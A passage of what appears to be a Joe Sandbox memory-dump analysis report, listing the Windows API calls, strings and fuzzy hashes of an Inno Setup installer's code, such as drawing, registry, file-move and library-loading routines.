                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 262959230-0
                                                              • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                              • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                              • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                              • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                              APIs
                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                              • RealizePalette.GDI32(00000000), ref: 00414421
                                                              • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                              • RealizePalette.GDI32(00000000), ref: 0041443B
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                              Similarity
                                                              • API ID: Palette$RealizeSelect$Release
                                                              • String ID:
                                                              • API String ID: 2261976640-0
                                                              • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                              • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                              • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                              • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                              APIs
                                                                • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                              • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                              • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                              • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                              Strings
                                                              Similarity
                                                              • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                              • String ID: vLB
                                                              • API String ID: 1477829881-1797516613
                                                              • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                              • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                              • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                              • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                              APIs
                                                              • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                              • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                              • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                              Strings
                                                              Similarity
                                                              • API ID: Enum$NameOpenResourceUniversal
                                                              • String ID: Z
                                                              • API String ID: 3604996873-1505515367
                                                              • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                              • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                              • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                              • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                              APIs
                                                              • SetRectEmpty.USER32(?), ref: 0044D04E
                                                              • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                              • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                              Strings
                                                              Similarity
                                                              • API ID: DrawText$EmptyRect
                                                              • String ID:
                                                              • API String ID: 182455014-2867612384
                                                              • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                              • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                              • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                              • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042EF9E
                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                              • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                              • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                              Strings
                                                              Similarity
                                                              • API ID: CreateFontIndirectObjectReleaseSelect
                                                              • String ID: ...\
                                                              • API String ID: 3133960002-983595016
                                                              • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                              • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                              • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                              • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                              APIs
                                                              • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                              • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                              • RegisterClassA.USER32(?), ref: 004164CE
                                                              Strings
                                                              Similarity
                                                              • API ID: Class$InfoRegisterUnregister
                                                              • String ID: @
                                                              • API String ID: 3749476976-2766056989
                                                              • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                              • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                              • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                              • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                              • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                              Strings
                                                              Similarity
                                                              • API ID: File$Attributes$Move
                                                              • String ID: isRS-%.3u.tmp
                                                              • API String ID: 3839737484-3657609586
                                                              • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                              • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                              • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                              • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                              • ExitProcess.KERNEL32 ref: 00404E0D
                                                              Strings
                                                              Similarity
                                                              • API ID: ExitMessageProcess
                                                              • String ID: Error$Runtime error at 00000000
                                                              • API String ID: 1220098344-2970929446
                                                              • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                              • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                              • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                              • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                              APIs
                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                              • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                              • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                              Strings
                                                              Similarity
                                                              • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                              • String ID: LoadTypeLib$RegisterTypeLib
                                                              • API String ID: 1312246647-2435364021
                                                              • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                              • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                              • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                              • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                              APIs
                                                              • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                              • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                              Strings
                                                              • Failed to create DebugClientWnd, xrefs: 004571D4
                                                              • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                              • API String ID: 3850602802-3720027226
                                                              • Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                              • Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
                                                              • Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
                                                              • Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
                                                              APIs
                                                                • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              • GetFocus.USER32 ref: 00478757
                                                              • GetKeyState.USER32(0000007A), ref: 00478769
                                                              • WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FocusMessageStateTextWaitWindow
                                                              • String ID: Wnd=$%x
                                                              • API String ID: 1381870634-2927251529
                                                              • Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
                                                              • Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
                                                              • Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
                                                              APIs
                                                              • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
                                                              Similarity
                                                              • API ID: Time$File$LocalSystem
                                                              • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                              • API String ID: 1748579591-1013271723
                                                              • Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
                                                              • Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
                                                              • Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
                                                              APIs
                                                              • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
                                                                • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Similarity
                                                              • API ID: File$AttributesDeleteErrorLastMove
                                                              • String ID: DeleteFile$MoveFile
                                                              • API String ID: 3024442154-139070271
                                                              • Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
                                                              • Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
                                                              • Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
                                                              Similarity
                                                              • API ID: CloseOpen
                                                              • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                              • API String ID: 47109696-2631785700
                                                              • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                              • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                              • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                              APIs
                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                              • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                              • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                              Strings
                                                              • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                              • CSDVersion, xrefs: 00483BFC
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                              • API String ID: 3677997916-1910633163
                                                              • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                              • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                              • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                              • API String ID: 1646373207-4063490227
                                                              • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                              • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                              • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                              • API String ID: 1646373207-260599015
                                                              • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                              • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                              • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: NotifyWinEvent$user32.dll
                                                              • API String ID: 1646373207-597752486
                                                              • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                              • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                              • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                              • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: DisableProcessWindowsGhosting$user32.dll
                                                              • API String ID: 1646373207-834958232
                                                              • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                              • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                              • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                              APIs
                                                                • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                              • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                              • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                              • API String ID: 2238633743-2683653824
                                                              • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                              • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                              • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                              APIs
                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                              • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                              Similarity
                                                              • API ID: Find$CloseFileNext
                                                              • String ID:
                                                              • API String ID: 2066263336-0
                                                              • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                              • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                              • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                              • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                              APIs
                                                                • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                              • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                              Strings
                                                              Similarity
                                                              • API ID: CountErrorFileLastMoveTick
                                                              • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                              • API String ID: 2406187244-2685451598
                                                              • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                              • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                              • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                              • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                              APIs
                                                              • GetDesktopWindow.USER32 ref: 00413D46
                                                              • GetDesktopWindow.USER32 ref: 00413DFE
                                                                • Part of subcall function 00418EC0: 6F5AC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                              • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                              Similarity
                                                              • API ID: CursorDesktopWindow$Show
                                                              • String ID:
                                                              • API String ID: 2074268717-0
                                                              • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                              • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                              • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                              • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                              • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                              • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                              Similarity
                                                              • API ID: LoadString$FileMessageModuleName
                                                              • String ID:
                                                              • API String ID: 704749118-0
                                                              • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                              • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                              • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                              • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                              APIs
                                                              • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                              • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                              • IsRectEmpty.USER32(?), ref: 0044E953
                                                              • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                              Similarity
                                                              • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                              • String ID:
                                                              • API String ID: 855768636-0
                                                              • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                              • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                              • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                              • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                              APIs
                                                              • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                              • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                              • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                              • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                              Similarity
                                                              • API ID: OffsetRect
                                                              • String ID:
                                                              • API String ID: 177026234-0
                                                              • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                              • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                              • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                              • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                              APIs
                                                              • GetCursorPos.USER32 ref: 00417260
                                                              • SetCursor.USER32(00000000), ref: 004172A3
                                                              • GetLastActivePopup.USER32(?), ref: 004172CD
                                                              • GetForegroundWindow.USER32(?), ref: 004172D4
                                                              Similarity
                                                              • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                              • String ID:
                                                              • API String ID: 1959210111-0
                                                              • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                              • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                              • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                              • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                              APIs
                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
